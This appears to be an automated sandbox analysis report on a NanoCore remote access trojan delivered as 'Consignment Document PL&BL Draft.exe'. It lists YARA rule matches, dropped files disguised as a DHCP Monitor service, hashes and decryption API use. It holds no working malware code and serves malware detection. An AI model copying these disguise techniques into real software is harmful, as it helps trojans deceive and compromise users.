                    Source: Yara matchFile source: 00000003.00000002.492629287.0000000004167000.00000004.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000011.00000002.288342555.0000000000C82000.00000002.00020000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000011.00000002.292802539.0000000003331000.00000004.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000003.00000002.494089209.0000000005970000.00000004.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000003.00000000.239526558.0000000000A42000.00000002.00020000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000011.00000002.292878095.0000000004331000.00000004.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000011.00000000.272991155.0000000000C82000.00000002.00020000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000001.00000002.244055752.00000000041A9000.00000004.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000003.00000002.483884950.0000000000A42000.00000002.00020000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: dhcpmon.exe PID: 6608, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: Icda.exe PID: 6888, type: MEMORY
                    Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\Icda.exe, type: DROPPED
                    Source: Yara matchFile source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe, type: DROPPED
                    Source: Yara matchFile source: 17.0.dhcpmon.exe.c80000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 3.2.Icda.exe.a40000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 3.2.Icda.exe.5970000.5.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 3.0.Icda.exe.a40000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 3.2.Icda.exe.5970000.5.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 17.2.dhcpmon.exe.c80000.0.unpack, type: UNPACKEDPE

                    System Summary:

                    barindex
                    Malicious sample detected (through community Yara rule)Show sources
                    Source: 00000003.00000002.492629287.0000000004167000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 00000011.00000002.288342555.0000000000C82000.00000002.00020000.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
                    Source: 00000011.00000002.288342555.0000000000C82000.00000002.00020000.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 00000011.00000002.292802539.0000000003331000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 00000003.00000002.494089209.0000000005970000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
                    Source: 00000003.00000000.239526558.0000000000A42000.00000002.00020000.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
                    Source: 00000003.00000000.239526558.0000000000A42000.00000002.00020000.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 00000011.00000002.292878095.0000000004331000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 00000011.00000000.272991155.0000000000C82000.00000002.00020000.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
                    Source: 00000011.00000000.272991155.0000000000C82000.00000002.00020000.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 00000001.00000002.244055752.00000000041A9000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
                    Source: 00000001.00000002.244055752.00000000041A9000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 00000003.00000002.493993810.00000000056D0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
                    Source: 00000003.00000002.483884950.0000000000A42000.00000002.00020000.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
                    Source: 00000003.00000002.483884950.0000000000A42000.00000002.00020000.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
                    Source: Process Memory Space: dhcpmon.exe PID: 6608, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
                    Source: Process Memory Space: dhcpmon.exe PID: 6608, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
                    Source: Process Memory Space: Icda.exe PID: 6888, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
                    Source: Process Memory Space: Icda.exe PID: 6888, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
                    Source: C:\Users\user\AppData\Local\Temp\Icda.exe, type: DROPPEDMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
                    Source: C:\Users\user\AppData\Local\Temp\Icda.exe, type: DROPPEDMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
                    Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe, type: DROPPEDMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
                    Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe, type: DROPPEDMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 3.2.Icda.exe.56d0000.3.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
                    Source: 17.0.dhcpmon.exe.c80000.0.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
                    Source: 17.0.dhcpmon.exe.c80000.0.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 3.2.Icda.exe.a40000.0.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
                    Source: 3.2.Icda.exe.a40000.0.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 3.2.Icda.exe.5970000.5.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
                    Source: 3.0.Icda.exe.a40000.0.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
                    Source: 3.0.Icda.exe.a40000.0.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 3.2.Icda.exe.5970000.5.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
                    Source: 17.2.dhcpmon.exe.c80000.0.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
                    Source: 17.2.dhcpmon.exe.c80000.0.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
                    Initial sample is a PE file and has a suspicious nameShow sources
                    Source: initial sampleStatic PE information: Filename: Consignment Document PL&BL Draft.exe
                    Source: C:\Users\user\AppData\Local\Temp\Icda.exeCode function: 3_2_0529131A NtQuerySystemInformation,
                    Source: C:\Users\user\AppData\Local\Temp\Icda.exeCode function: 3_2_052912DF NtQuerySystemInformation,
                    Source: C:\Users\user\Desktop\Consignment Document PL&BL Draft.exeCode function: 0_2_015EC0F4
                    Source: C:\Users\user\Desktop\Consignment Document PL&BL Draft.exeCode function: 0_2_015EE538
                    Source: C:\Users\user\Desktop\Consignment Document PL&BL Draft.exeCode function: 0_2_015EE528
                    Source: C:\Users\user\Desktop\Consignment Document PL&BL Draft.exeCode function: 0_2_076D0040
                    Source: C:\Users\user\Desktop\Consignment Document PL&BL Draft.exeCode function: 1_2_0167E408
                    Source: C:\Users\user\Desktop\Consignment Document PL&BL Draft.exeCode function: 1_2_0167E418
                    Source: C:\Users\user\Desktop\Consignment Document PL&BL Draft.exeCode function: 1_2_0167B7BC
                    Source: C:\Users\user\AppData\Local\Temp\Icda.exeCode function: 3_2_00A4524A
                    Source: C:\Users\user\AppData\Local\Temp\Icda.exeCode function: 3_2_0523B068
                    Source: C:\Users\user\AppData\Local\Temp\Icda.exeCode function: 3_2_05233850
                    Source: C:\Users\user\AppData\Local\Temp\Icda.exeCode function: 3_2_052323A0
                    Source: C:\Users\user\AppData\Local\Temp\Icda.exeCode function: 3_2_05232FA8
                    Source: C:\Users\user\AppData\Local\Temp\Icda.exeCode function: 3_2_05238798
                    Source: C:\Users\user\AppData\Local\Temp\Icda.exeCode function: 3_2_0523306F
                    Source: C:\Users\user\AppData\Local\Temp\Icda.exeCode function: 3_2_0523945F
                    Source: C:\Users\user\AppData\Local\Temp\Icda.exeCode function: 3_2_05239398
                    Source: C:\Users\user\AppData\Local\Temp\Fdquqwatjjr.exeCode function: 5_2_004E2296
                    Source: C:\Users\user\AppData\Local\Temp\Fdquqwatjjr.exeCode function: 5_2_00A16070
                    Source: C:\Users\user\AppData\Local\Temp\Fdquqwatjjr.exeCode function: 5_2_00A17078
                    Source: C:\Users\user\AppData\Local\Temp\Fdquqwatjjr.exeCode function: 5_2_00A1085D
                    Source: C:\Users\user\AppData\Local\Temp\Fdquqwatjjr.exeCode function: 5_2_00A15698
                    Source: C:\Users\user\AppData\Local\Temp\Fdquqwatjjr.exeCode function: 5_2_00A133E0
                    Source: C:\Users\user\AppData\Local\Temp\Fdquqwatjjr.exeCode function: 5_2_00A19FC8
                    Source: C:\Users\user\AppData\Local\Temp\Fdquqwatjjr.exeCode function: 5_2_00A1EB00
                    Source: C:\Users\user\AppData\Local\Temp\Fdquqwatjjr.exeCode function: 5_2_00A16F80
                    Source: C:\Users\user\AppData\Local\Temp\Fdquqwatjjr.exeCode function: 5_2_026D46A0
                    Source: C:\Users\user\AppData\Local\Temp\Fdquqwatjjr.exeCode function: 5_2_026D45B0
                    Source: C:\Users\user\AppData\Local\Temp\Fdquqwatjjr.exeCode function: 5_2_026DD2E1
                    Source: C:\Users\user\AppData\Local\Temp\Fdquqwatjjr.exeCode function: 5_2_05A67538
                    Source: C:\Users\user\AppData\Local\Temp\Fdquqwatjjr.exeCode function: 5_2_05A66C68
                    Source: C:\Users\user\AppData\Local\Temp\Fdquqwatjjr.exeCode function: 5_2_05A66920
                    Source: C:\Users\user\AppData\Local\Temp\Fdquqwatjjr.exeCode function: 5_2_05A690F8
                    Source: Joe Sandbox ViewDropped File: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe 9589565F7BEB6DCCFE4F8424455271BBF810182EA94DACBC8C081577E34A51E1
                    Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Temp\Fdquqwatjjr.exe C0791632452FD17FDB08B4241AD7B6F5AAF1AF6190861301135EF3631F4B4020
                    Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Temp\Icda.exe 9589565F7BEB6DCCFE4F8424455271BBF810182EA94DACBC8C081577E34A51E1
                    Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Temp\Isgeprf.exe 488C59FDDF2DB00DA7FB4D6589183ADC7396EDC4233F23EB950AA7191FE4366E
                    Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Temp\Rczgwoxvqzh.exe 97A5CAB2336F3B81F82D7EC85B2F0937CE39D10E512BF0BDADE9248D6D1BC682
                    Source: Consignment Document PL&BL Draft.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                    Source: Consignment Document PL&BL Draft.exeBinary or memory string: OriginalFilename vs Consignment Document PL&BL Draft.exe
                    Source: Consignment Document PL&BL Draft.exe, 00000000.00000002.234374124.0000000003066000.00000004.00000001.sdmpBinary or memory string: OriginalFilename3in1.exe4 vs Consignment Document PL&BL Draft.exe
                    Source: Consignment Document PL&BL Draft.exe, 00000000.00000002.234335225.0000000003011000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameB2B.exe4 vs Consignment Document PL&BL Draft.exe
                    Source: Consignment Document PL&BL Draft.exeBinary or memory string: OriginalFilename vs Consignment Document PL&BL Draft.exe
                    Source: Consignment Document PL&BL Draft.exe, 00000001.00000002.243408659.00000000031A1000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameVLC22.exe4 vs Consignment Document PL&BL Draft.exe
                    Source: Consignment Document PL&BL Draft.exe, 00000001.00000002.240881218.000000000044A000.00000040.00000001.sdmpBinary or memory string: OriginalFilename3in1.exe4 vs Consignment Document PL&BL Draft.exe
                    Source: Consignment Document PL&BL Draft.exeBinary or memory string: OriginalFilename vs Consignment Document PL&BL Draft.exe
                    Source: 00000003.00000002.492629287.0000000004167000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
                    Source: 00000011.00000002.288342555.0000000000C82000.00000002.00020000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
                    Source: 00000011.00000002.288342555.0000000000C82000.00000002.00020000.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
                    Source: 00000011.00000002.292802539.0000000003331000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
                    Source: 00000003.00000002.494089209.0000000005970000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
                    Source: 00000003.00000002.494089209.0000000005970000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
                    Source: 00000003.00000000.239526558.0000000000A42000.00000002.00020000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
                    Source: 00000003.00000000.239526558.0000000000A42000.00000002.00020000.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
                    Source: 00000011.00000002.292878095.0000000004331000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
                    Source: 00000011.00000000.272991155.0000000000C82000.00000002.00020000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
                    Source: 00000011.00000000.272991155.0000000000C82000.00000002.00020000.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
                    Source: 00000001.00000002.244055752.00000000041A9000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
                    Source: 00000001.00000002.244055752.00000000041A9000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
                    Source: 00000003.00000002.493993810.00000000056D0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
                    Source: 00000003.00000002.493993810.00000000056D0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
                    Source: 00000003.00000002.483884950.0000000000A42000.00000002.00020000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
                    Source: 00000003.00000002.483884950.0000000000A42000.00000002.00020000.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
                    Source: Process Memory Space: dhcpmon.exe PID: 6608, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
                    Source: Process Memory Space: dhcpmon.exe PID: 6608, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
                    Source: Process Memory Space: Icda.exe PID: 6888, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
                    Source: Process Memory Space: Icda.exe PID: 6888, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
                    Source: C:\Users\user\AppData\Local\Temp\Icda.exe, type: DROPPEDMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
                    Source: C:\Users\user\AppData\Local\Temp\Icda.exe, type: DROPPEDMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
                    Source: C:\Users\user\AppData\Local\Temp\Icda.exe, type: DROPPEDMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
                    Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe, type: DROPPEDMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
                    Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe, type: DROPPEDMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
                    Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe, type: DROPPEDMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
                    Source: 3.2.Icda.exe.56d0000.3.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
                    Source: 3.2.Icda.exe.56d0000.3.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
                    Source: 17.0.dhcpmon.exe.c80000.0.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
                    Source: 17.0.dhcpmon.exe.c80000.0.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
                    Source: 17.0.dhcpmon.exe.c80000.0.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
                    Source: 3.2.Icda.exe.a40000.0.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
                    Source: 3.2.Icda.exe.a40000.0.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
                    Source: 3.2.Icda.exe.a40000.0.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
                    Source: 3.2.Icda.exe.5970000.5.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
                    Source: 3.2.Icda.exe.5970000.5.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
                    Source: 3.0.Icda.exe.a40000.0.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
                    Source: 3.0.Icda.exe.a40000.0.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
                    Source: 3.0.Icda.exe.a40000.0.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
                    Source: 3.2.Icda.exe.5970000.5.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
                    Source: 3.2.Icda.exe.5970000.5.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
                    Source: 17.2.dhcpmon.exe.c80000.0.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
                    Source: 17.2.dhcpmon.exe.c80000.0.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
                    Source: 17.2.dhcpmon.exe.c80000.0.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
                    Source: Consignment Document PL&BL Draft.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                    Source: Rczgwoxvqzh.exe.1.drStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                    Source: Icda.exe.1.drStatic PE information: Section: .rsrc ZLIB complexity 0.99953125
                    Source: dhcpmon.exe.3.drStatic PE information: Section: .rsrc ZLIB complexity 0.99953125
                    Source: Icda.exe.1.dr, u0023u003dqVxXNKnhAcArgJoGGYXiyyQu003du003d.csCryptographic APIs: 'CreateDecryptor'
                    Source: Icda.exe.1.dr, u0023u003dqVxXNKnhAcArgJoGGYXiyyQu003du003d.csCryptographic APIs: 'TransformFinalBlock'
                    Source: Icda.exe.1.dr, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
                    Source: dhcpmon.exe.3.dr, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
                    Source: dhcpmon.exe.3.dr, u0023u003dqVxXNKnhAcArgJoGGYXiyyQu003du003d.csCryptographic APIs: 'CreateDecryptor'
                    Source: dhcpmon.exe.3.dr, u0023u003dqVxXNKnhAcArgJoGGYXiyyQu003du003d.csCryptographic APIs: 'TransformFinalBlock'
